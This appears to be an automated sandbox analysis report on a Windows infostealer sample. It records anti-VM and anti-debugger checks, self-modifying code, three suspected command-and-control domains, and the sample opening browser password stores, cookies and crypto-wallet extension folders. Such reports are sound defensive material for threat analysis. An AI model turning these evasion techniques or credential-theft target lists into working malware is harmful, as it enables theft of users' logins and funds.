              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340A02 second address: 5330150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 5239A3CCh 0x00000008 pushfd 0x00000009 jmp 00007F88DC6CD045h 0x0000000e sbb si, 94A6h 0x00000013 jmp 00007F88DC6CD041h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c retn 0004h 0x0000001f nop 0x00000020 cmp eax, 00000000h 0x00000023 setne al 0x00000026 jmp 00007F88DC6CD032h 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007F88DC6CD037h 0x0000002e sub esp, 04h 0x00000031 mov dword ptr [esp], 0000000Dh 0x00000038 call 00007F88E0CCA764h 0x0000003d mov edi, edi 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F88DC6CD041h 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330150 second address: 5330165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330165 second address: 5330176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bx, ax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330176 second address: 53301AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushfd 0x00000007 jmp 00007F88DD0CB159h 0x0000000c and eax, 410D40E6h 0x00000012 jmp 00007F88DD0CB151h 0x00000017 popfd 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53301AE second address: 533022E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F88DC6CD040h 0x00000008 and eax, 42DF2C88h 0x0000000e jmp 00007F88DC6CD03Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F88DC6CD046h 0x0000001f mov ebp, esp 0x00000021 jmp 00007F88DC6CD040h 0x00000026 sub esp, 2Ch 0x00000029 jmp 00007F88DC6CD040h 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 mov edi, ecx 0x00000032 mov ch, 16h 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F88DC6CD03Eh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 533022E second address: 5330232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330232 second address: 5330238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330238 second address: 5330275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F88DD0CB14Ch 0x00000009 sbb cx, 06D8h 0x0000000e jmp 00007F88DD0CB14Bh 0x00000013 popfd 0x00000014 mov eax, 2BD7C98Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F88DD0CB151h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330275 second address: 5330285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DC6CD03Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302C0 second address: 53302C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302C4 second address: 53302CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302CA second address: 53302F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F88DD0CB14Ch 0x00000009 sbb cx, 4D28h 0x0000000e jmp 00007F88DD0CB14Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebx, 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302F9 second address: 53302FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 53302FD second address: 5330303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330303 second address: 5330344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F88DC6CD044h 0x00000009 and ax, DAB8h 0x0000000e jmp 00007F88DC6CD03Bh 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub edi, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F88DC6CD03Dh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330344 second address: 533034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Special instruction interceptor: First address: D57BC0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Special instruction interceptor: First address: D57CA4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Special instruction interceptor: First address: D57BEB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Special instruction interceptor: First address: F0394D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Special instruction interceptor: First address: D554D6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Special instruction interceptor: First address: F0C649 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Special instruction interceptor: First address: F8E4E5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe TID: 7952 | Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe TID: 7948 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
              Source: QQ5BxgG5G6.exe, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001579000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1580314108.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557463856.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634379503.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635616126.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001579000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579492722.00000000015AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1580314108.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557463856.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634379503.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635616126.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579492722.00000000015AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnP
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: SICE
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: steppriflej.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sendypaster.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: cuddlyready.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: o`&'XProgram Manager
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: `&'XProgram Manager
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: QQ5BxgG5G6.exe, QQ5BxgG5G6.exe, 00000000.00000003.1580207567.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1580314108.00000000015AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: QQ5BxgG5G6.exe PID: 7792, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: QQ5BxgG5G6.exe | String found in binary or memory: Wallets/Electrum
              Source: QQ5BxgG5G6.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
              Source: QQ5BxgG5G6.exe | String found in binary or memory: Jaxx Liberty
              Source: QQ5BxgG5G6.exe | String found in binary or memory: window-state.json
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1557425029.00000000015CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: QQ5BxgG5G6.exe | String found in binary or memory: %appdata%\Ethereum
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1557531889.0000000001617000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1557531889.0000000001617000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
